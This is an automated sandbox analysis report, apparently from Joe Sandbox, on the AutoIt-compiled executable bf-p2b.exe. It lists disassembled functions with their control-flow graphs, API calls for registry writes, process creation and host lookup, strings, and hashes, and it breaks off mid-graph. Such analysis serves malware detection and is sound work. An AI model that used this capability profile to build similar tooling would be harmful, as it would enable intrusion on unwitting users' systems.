                          control_flow_graph 608 b01f04-b01f9c call b02d1a * 2 call b0c935 * 2 call b07e53 call b0d3d2 * 3 625 b01fa2-b01fa6 608->625 626 b72569-b72575 call b22626 608->626 627 b7257d-b72583 call b3e4ea 625->627 628 b01fac-b01faf 625->628 626->627 632 b7258f-b7259b call b0a4f6 627->632 631 b01fb5-b01fb8 628->631 628->632 631->632 634 b01fbe-b01fc7 GetForegroundWindow call b0200a 631->634 640 b725a1-b725b1 call b0a4f6 632->640 641 b72899-b7289d 632->641 639 b01fcc-b01fe3 call b0197e 634->639 651 b01fe4-b02007 call b05cd3 * 3 639->651 640->641 654 b725b7-b725c5 640->654 643 b7289f-b728a6 call b0c935 641->643 644 b728ab-b728ae 641->644 643->644 648 b728b7-b728c4 644->648 649 b728b0 644->649 652 b728d6-b728da 648->652 653 b728c6-b728d4 call b0b8a7 CharUpperBuffW 648->653 649->648 655 b728f1-b728fa 652->655 656 b728dc-b728df 652->656 653->652 659 b725c9-b725e1 call b3d68d 654->659 661 b728fc-b72909 GetDesktopWindow EnumChildWindows 655->661 662 b7290b EnumWindows 655->662 656->655 660 b728e1-b728ef call b0b8a7 CharUpperBuffW 656->660 659->641 670 b725e7-b725f7 call b1f885 659->670 660->655 667 b72911-b72930 call b3e44e call b02d1a 661->667 662->667 685 b72932-b7293b call b0200a 667->685 686 b72940 667->686 680 b725fd-b7260d call b1f885 670->680 681 b7287b-b7288b call b1f885 670->681 692 b72613-b72623 call b1f885 680->692 693 b72861-b72871 call b1f885 680->693 690 b72873-b72876 681->690 691 b7288d-b72891 681->691 685->686 691->651 694 b72897 691->694 701 b7281d-b72836 call b488a2 IsWindow 692->701 702 b72629-b72639 call b1f885 692->702 693->690 700 b72842-b72848 GetForegroundWindow 693->700 697 b72852-b72858 694->697 697->693 704 b72849-b72850 call b0200a 700->704 701->651 709 b7283c-b72840 701->709 711 b7263b-b72640 702->711 712 b72659-b72669 call b1f885 702->712 704->697 709->704 714 b72646-b72657 call b05cf6 711->714 715 b7280d-b7280f 711->715 719 b7266b-b72675 712->719 720 b7267a-b7268a call b1f885 712->720 722 b7269b-b726a7 call b05be9 714->722 716 b72817-b72818 715->716 716->651 723 b727e6-b727f0 call b0c935 719->723 728 b726b5-b726c5 call b1f885 720->728 729 b7268c-b72698 call b05cf6 720->729 734 b72811-b72813 722->734 735 b726ad-b726b0 722->735 733 b72804-b72808 723->733 739 b726c7-b726de call b22241 728->739 740 b726e3-b726f3 call b1f885 728->740 729->722 733->659 734->716 735->733 739->733 745 b726f5-b7270c call b22241 740->745 746 b72711-b72721 call b1f885 740->746 745->733 751 b72723-b7273a call b22241 746->751 752 b7273f-b7274f call b1f885 746->752 751->733 757 b72751-b72768 call b22241 752->757 758 b7276d-b7277d call b1f885 752->758 757->733 763 b72795-b727a5 call b1f885 758->763 764 b7277f-b72793 call b22241 758->764 769 b727a7-b727b7 call b1f885 763->769 770 b727c3-b727d3 call b1f885 763->770 764->733 769->690 775 b727bd-b727c1 769->775 776 b727d5-b727da 770->776 777 b727f2-b72802 call b3d614 770->777 775->733 778 b72815 776->778 779 b727dc-b727e2 776->779 777->690 777->733 778->716 779->723
                          APIs
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • GetForegroundWindow.USER32 ref: 00B01FBE
                          • IsWindow.USER32(?), ref: 00B7282E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Foreground_memmove
                          • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                          • API String ID: 3828923867-1919597938
                          • Opcode ID: 76a08f6553bc1f51f20a230c6788f6ec6fd08feae365cef327630fc8022596ec
                          • Instruction ID: 8cc71e07df7f82152a14941b4d25779ca324ee5bea22bb276db32b02373e55ca
                          • Opcode Fuzzy Hash: 76a08f6553bc1f51f20a230c6788f6ec6fd08feae365cef327630fc8022596ec
                          • Instruction Fuzzy Hash: E2D1D730504603EBCB18EF14C481AAABBE1FF54340F548AEDF46A575E1DB31E999CB92
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B6352A Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 782 b6352a-b63569 call b0d3d2 * 3 789 b63574-b635e7 call b084a6 call b63d7b call b63af7 782->789 790 b6356b-b6356e 782->790 804 b63612-b63617 789->804 805 b635e9-b635f4 call b4d7e4 789->805 790->789 791 b635f9-b6360d call b12570 790->791 797 b63a94-b63ab7 call b05cd3 * 3 791->797 808 b6366d 804->808 809 b63619-b6362e RegConnectRegistryW 804->809 805->791 811 b63671-b6369c RegCreateKeyExW 808->811 812 b63667-b6366b 809->812 813 b63630-b63662 call b07ba9 call b4d7e4 call b12570 809->813 815 b636e7-b636ec 811->815 816 b6369e-b636d2 call b07ba9 call b4d7e4 call b12570 811->816 812->811 813->797 820 b636f2-b63715 call b084a6 call b21bc7 815->820 821 b63a7b-b63a8c RegCloseKey 815->821 816->797 840 b636d8-b636e2 RegCloseKey 816->840 835 b63796-b637b6 call b084a6 call b21bc7 820->835 836 b63717-b6376d call b084a6 call b218fb call b084a6 * 2 RegSetValueExW 820->836 821->797 824 b63a8e-b63a92 RegCloseKey 821->824 824->797 847 b63840-b63860 call b084a6 call b21bc7 835->847 848 b637bc-b63814 call b084a6 call b218fb call b084a6 * 2 RegSetValueExW 835->848 836->821 861 b63773-b63791 call b07ba9 call b12570 836->861 840->797 862 b63866-b638c9 call b084a6 call b2010a call b084a6 call b03b1e 847->862 863 b63949-b63969 call b084a6 call b21bc7 847->863 848->821 880 b6381a-b6383b call b07ba9 call b12570 848->880 881 b63a74 861->881 898 b638cb-b638d0 862->898 899 b638e9-b63918 call b084a6 RegSetValueExW 862->899 882 b639c6-b639e6 call b084a6 call b21bc7 863->882 883 b6396b-b6398b call b0cdb4 call b084a6 863->883 880->821 881->821 904 b63a13-b63a30 call b084a6 call b21bc7 882->904 905 b639e8-b63a0e call b0d00b call b084a6 882->905 907 b6398d-b639a1 RegSetValueExW 883->907 902 b638d2-b638d4 898->902 903 b638d8-b638db 898->903 915 b6393d-b63944 call b2017e 899->915 916 b6391a-b63936 call b07ba9 call b12570 899->916 902->903 903->898 908 b638dd-b638df 903->908 930 b63a67-b63a71 call b12570 904->930 931 b63a32-b63a60 call b4be47 call b084a6 call b4be8a 904->931 905->907 907->821 912 b639a7-b639c1 call b07ba9 call b12570 907->912 908->899 913 b638e1-b638e5 908->913 912->881 913->899 915->821 916->915 930->881 931->930
                          APIs
                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B63626
                          • RegCreateKeyExW.KERNEL32(?,?,00000000,00B9DBF0,00000000,?,00000000,?,?), ref: 00B63694
                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B636DC
                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B63765
                          • RegCloseKey.ADVAPI32(?), ref: 00B63A85
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B63A92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$ConnectCreateRegistryValue
                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                          • API String ID: 536824911-966354055
                          • Opcode ID: 3cda39320f0dc3e746c6f5155e8079b710187c17bc3e09090d80f8fa4db6af28
                          • Instruction ID: 4614e1fe5f35612eada5d65d4d6a2756bf4499f4244f76bdc8f2487ff3933f09
                          • Opcode Fuzzy Hash: 3cda39320f0dc3e746c6f5155e8079b710187c17bc3e09090d80f8fa4db6af28
                          • Instruction Fuzzy Hash: 0A024B756006019FCB14EF15C895E2ABBE5FF89720F05859DF88A9B3A2DB34EE41CB41
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B04257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\bf-p2b.exe,00000104,?,00000000,00000001,00000000), ref: 00B0428C
                            • Part of subcall function 00B0CAEE: _memmove.LIBCMT ref: 00B0CB2F
                            • Part of subcall function 00B21BC7: __wcsicmp_l.LIBCMT ref: 00B21C50
                          • _wcscpy.LIBCMT ref: 00B043C0
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\bf-p2b.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 00B7214E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: FileModuleName$__wcsicmp_l_memmove_wcscpy
                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\Desktop\bf-p2b.exe$CMDLINE$CMDLINERAW
                          • API String ID: 861526374-1798614123
                          • Opcode ID: 63820c1a348d72dcf01338c4db8b9215da255a93747d01f6a5c73a02d53c0f15
                          • Instruction ID: dd118457d4c61d7d647fa7c022e7d855a80872fda1e4a6a73d3b516c9843eef1
                          • Opcode Fuzzy Hash: 63820c1a348d72dcf01338c4db8b9215da255a93747d01f6a5c73a02d53c0f15
                          • Instruction Fuzzy Hash: EE81A0B2900119AACB14EBE4DD92EEF7BF8EF15350F5004A9E641B71D2EF706A04CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B478EE Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72networkCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1094 b478ee-b47911 WSAStartup 1095 b47917-b47938 gethostname gethostbyname 1094->1095 1096 b479b1-b479bd call b21943 1094->1096 1095->1096 1097 b4793a-b47941 1095->1097 1105 b479be-b479c1 1096->1105 1099 b47943 1097->1099 1100 b4794e-b47950 1097->1100 1102 b47945-b4794c 1099->1102 1103 b47961-b479a6 call b1faa0 inet_ntoa call b23220 call b48553 call b21943 call b2017e 1100->1103 1104 b47952-b4795f call b21943 1100->1104 1102->1100 1102->1102 1110 b479a9-b479af WSACleanup 1103->1110 1104->1110 1110->1105
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                          • String ID: 0.0.0.0
                          • API String ID: 208665112-3771769585
                          • Opcode ID: 5757be58d4d5d35809b6c9d9e42c8a1c8c3975fea8ee6cff32db7ea1bd4664db
                          • Instruction ID: b9ec7f478f7fdfe5d20160f3615ab0df341df81514fade766f5e17524daa7d1e
                          • Opcode Fuzzy Hash: 5757be58d4d5d35809b6c9d9e42c8a1c8c3975fea8ee6cff32db7ea1bd4664db
                          • Instruction Fuzzy Hash: 7711D235948125BBDB24A774AC4AEEE77ECEF00720F1000E6F449A60A1EF70DB81D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B1E975 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 170COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B1EA39
                          • __wsplitpath.LIBCMT ref: 00B1EA56
                            • Part of subcall function 00B2297D: __wsplitpath_helper.LIBCMT ref: 00B229BD
                          • _wcsncat.LIBCMT ref: 00B1EA69
                          • __makepath.LIBCMT ref: 00B1EA85
                            • Part of subcall function 00B22BFF: __wmakepath_s.LIBCMT ref: 00B22C13
                            • Part of subcall function 00B2010A: std::exception::exception.LIBCMT ref: 00B2013E
                            • Part of subcall function 00B2010A: __CxxThrowException@8.LIBCMT ref: 00B20153
                          • _wcscpy.LIBCMT ref: 00B1EABE
                            • Part of subcall function 00B1EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00B1EADA,?,?), ref: 00B1EB27
                          • _wcscat.LIBCMT ref: 00B732FC
                          • _wcscat.LIBCMT ref: 00B73334
                          • _wcsncpy.LIBCMT ref: 00B73370
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                          • String ID: Include$\
                          • API String ID: 1213536620-3429789819
                          • Opcode ID: df2e87c22299c68e0686e71283c9be376104f1cc0f83b128de82091ce913350f
                          • Instruction ID: 0021816416d02a23805382c28674e9a039b72e010db08336a59f28e472dafc22
                          • Opcode Fuzzy Hash: df2e87c22299c68e0686e71283c9be376104f1cc0f83b128de82091ce913350f
                          • Instruction Fuzzy Hash: 02513EB24043809FC315EF59EC85C9AB7E8FB8D301B80496EF549D72A1EF749644CB6A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B030A5 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00B030B0
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00B030BF
                          • LoadIconW.USER32(00000063), ref: 00B030D5
                          • LoadIconW.USER32(000000A4), ref: 00B030E7
                          • LoadIconW.USER32(000000A2), ref: 00B030F9
                            • Part of subcall function 00B0318A: LoadImageW.USER32(00B00000,00000063,00000001,00000010,00000010,00000000), ref: 00B031AE
                          • RegisterClassExW.USER32(?), ref: 00B03167
                            • Part of subcall function 00B02F58: GetSysColorBrush.USER32(0000000F), ref: 00B02F8B
                            • Part of subcall function 00B02F58: RegisterClassExW.USER32(00000030), ref: 00B02FB5
                            • Part of subcall function 00B02F58: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B02FC6
                            • Part of subcall function 00B02F58: LoadIconW.USER32(000000A9), ref: 00B03009
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                          • String ID: #$0$AutoIt v3
                          • API String ID: 2880975755-4155596026
                          • Opcode ID: 3e2be33421c6c582e16993810ebaf8f6ba15d60231abff2371219c680183295b
                          • Instruction ID: 6e7024a64a8369fd2178a3bca41c646144dfb7af597a66094cccad07d4f7be91
                          • Opcode Fuzzy Hash: 3e2be33421c6c582e16993810ebaf8f6ba15d60231abff2371219c680183295b
                          • Instruction Fuzzy Hash: 112139B4D00304AFCB009FA9EC49E99BFF5FB4D310F14892AE614B32A1DB7449448B91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B02F58 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 53registrywindowclipboardCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00B02F8B
                          • RegisterClassExW.USER32(00000030), ref: 00B02FB5
                          • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 00B02FC6
                          • LoadIconW.USER32(000000A9), ref: 00B03009
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Register$BrushClassClipboardColorFormatIconLoad
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 975902462-1005189915
                          • Opcode ID: bfa7c8e7bf3058a1dd4bae2f22a8196a6268e725249f47e8582f8e04b003e203
                          • Instruction ID: 14788e7bbafbb476c925974ad6bbe3caa1f90f4ad5a9c35a1b733f68ea690edd
                          • Opcode Fuzzy Hash: bfa7c8e7bf3058a1dd4bae2f22a8196a6268e725249f47e8582f8e04b003e203
                          • Instruction Fuzzy Hash: 7921BFB5904318AFDB009FA8E889BCEBBF4FB09700F10461AF615B72A0DBB04544CF91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B623C5 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1346 b623c5-b62426 call b21970 1349 b62452-b62456 1346->1349 1350 b62428-b6243b call b0cdb4 1346->1350 1352 b6249d-b624a3 1349->1352 1353 b62458-b62468 call b0cdb4 1349->1353 1358 b6243d-b62450 call b0cdb4 1350->1358 1359 b62488 1350->1359 1355 b624a5-b624a8 1352->1355 1356 b624b8-b624be 1352->1356 1368 b6246b-b62484 call b0cdb4 1353->1368 1360 b624ab-b624b0 call b0cdb4 1355->1360 1361 b624c0 1356->1361 1362 b624c8-b624e2 call b084a6 call b03bcf 1356->1362 1358->1368 1364 b6248b-b6248f 1359->1364 1360->1356 1361->1362 1379 b625a1-b625a9 1362->1379 1380 b624e8-b62541 call b084a6 call b03bcf call b084a6 call b03bcf call b084a6 call b03bcf 1362->1380 1369 b62491-b62497 1364->1369 1370 b62499-b6249b 1364->1370 1368->1352 1378 b62486 1368->1378 1369->1360 1370->1352 1370->1356 1378->1364 1382 b625d3-b62601 GetCurrentDirectoryW call b2010a GetCurrentDirectoryW 1379->1382 1383 b625ab-b625c6 call b084a6 call b03bcf 1379->1383 1428 b62543-b6255e call b084a6 call b03bcf 1380->1428 1429 b6256f-b6259f GetSystemDirectoryW call b2010a GetSystemDirectoryW 1380->1429 1391 b62605 1382->1391 1383->1382 1399 b625c8-b625d1 call b218fb 1383->1399 1394 b62609-b6260d 1391->1394 1397 b6263e-b6264e call b49a8f 1394->1397 1398 b6260f-b62639 call b0ca8e * 3 1394->1398 1410 b62650-b6269b call b4a17a call b4a073 call b4a102 1397->1410 1411 b626aa 1397->1411 1398->1397 1399->1382 1399->1397 1413 b626ac-b626bb 1410->1413 1442 b6269d-b626a8 1410->1442 1411->1413 1417 b626c1-b626f1 call b3bc90 call b218fb 1413->1417 1418 b6274c-b62768 CreateProcessW 1413->1418 1443 b626f3-b626f8 1417->1443 1444 b626fa-b6270a call b218fb 1417->1444 1424 b6276b-b6277e call b2017e * 2 1418->1424 1447 b62780-b627b8 call b4d7e4 GetLastError call b07ba9 call b12570 1424->1447 1448 b627bd-b627c9 CloseHandle 1424->1448 1428->1429 1450 b62560-b62569 call b218fb 1428->1450 1429->1391 1442->1413 1443->1443 1443->1444 1454 b62713-b62723 call b218fb 1444->1454 1455 b6270c-b62711 1444->1455 1463 b6283e-b6284f call b49b29 1447->1463 1452 b627f5-b627f9 1448->1452 1453 b627cb-b627f0 call b49d09 call b4a37f call b62881 1448->1453 1450->1394 1450->1429 1457 b62807-b62811 1452->1457 1458 b627fb-b62805 1452->1458 1453->1452 1474 b62725-b6272a 1454->1474 1475 b6272c-b6274a call b2017e * 3 1454->1475 1455->1454 1455->1455 1464 b62813 1457->1464 1465 b62819-b62838 call b12570 CloseHandle 1457->1465 1458->1463 1464->1465 1465->1463 1474->1474 1474->1475 1475->1424
                          APIs
                          • _memset.LIBCMT ref: 00B623E6
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B62579
                          • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00B6259D
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B625DD
                          • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00B625FF
                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B62760
                          • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00B62792
                          • CloseHandle.KERNEL32(?), ref: 00B627C1
                          • CloseHandle.KERNEL32(?), ref: 00B62838
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                          • String ID:
                          • API String ID: 4090791747-0
                          • Opcode ID: c658f99f385f677bdc0fa2d4f876d847ab8dae6e73683527575477d4efb6cb7e
                          • Instruction ID: af2795c2773f62613d2548ee76ffae5fc818b15ff6d771f5d95ba80ab4fe3686
                          • Opcode Fuzzy Hash: c658f99f385f677bdc0fa2d4f876d847ab8dae6e73683527575477d4efb6cb7e
                          • Instruction Fuzzy Hash: 8ED1B035604701DFDB24EF24D891A6ABBE1EF84314F1885ADF8899B3A2DB34DD41CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00B5C8B7 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1487 b5c8b7-b5c8f1 1488 b5c8f7-b5c8fa 1487->1488 1489 b5ccfb-b5ccff 1487->1489 1488->1489 1491 b5c900-b5c903 1488->1491 1490 b5cd04-b5cd05 1489->1490 1492 b5cd06 call b5c235 1490->1492 1491->1489 1493 b5c909-b5c912 call b5cff8 1491->1493 1496 b5cd0b-b5cd0f 1492->1496 1498 b5c925-b5c92e call b4be14 1493->1498 1499 b5c914-b5c920 1493->1499 1502 b5c934-b5c93a 1498->1502 1503 b5cc61-b5cc6c call b0d2c0 1498->1503 1499->1492 1504 b5c940 1502->1504 1505 b5c93c-b5c93e 1502->1505 1511 b5cc6e-b5cc72 1503->1511 1512 b5cca9-b5ccb4 call b0d2c0 1503->1512 1507 b5c942-b5c94a 1504->1507 1505->1507 1509 b5c950-b5c967 call b3abf3 1507->1509 1510 b5ccec-b5ccf4 1507->1510 1521 b5c973-b5c97f 1509->1521 1522 b5c969-b5c96e 1509->1522 1510->1489 1515 b5cc74-b5cc76 1511->1515 1516 b5cc78 1511->1516 1512->1510 1520 b5ccb6-b5ccba 1512->1520 1519 b5cc7a-b5cc98 call b1d6b4 call b497b6 1515->1519 1516->1519 1541 b5cc99-b5cca7 call b4d7e4 1519->1541 1524 b5ccc0 1520->1524 1525 b5ccbc-b5ccbe 1520->1525 1526 b5c981-b5c98d 1521->1526 1527 b5c9ce-b5c9f9 call b1fa89 1521->1527 1522->1490 1530 b5ccc2-b5ccea call 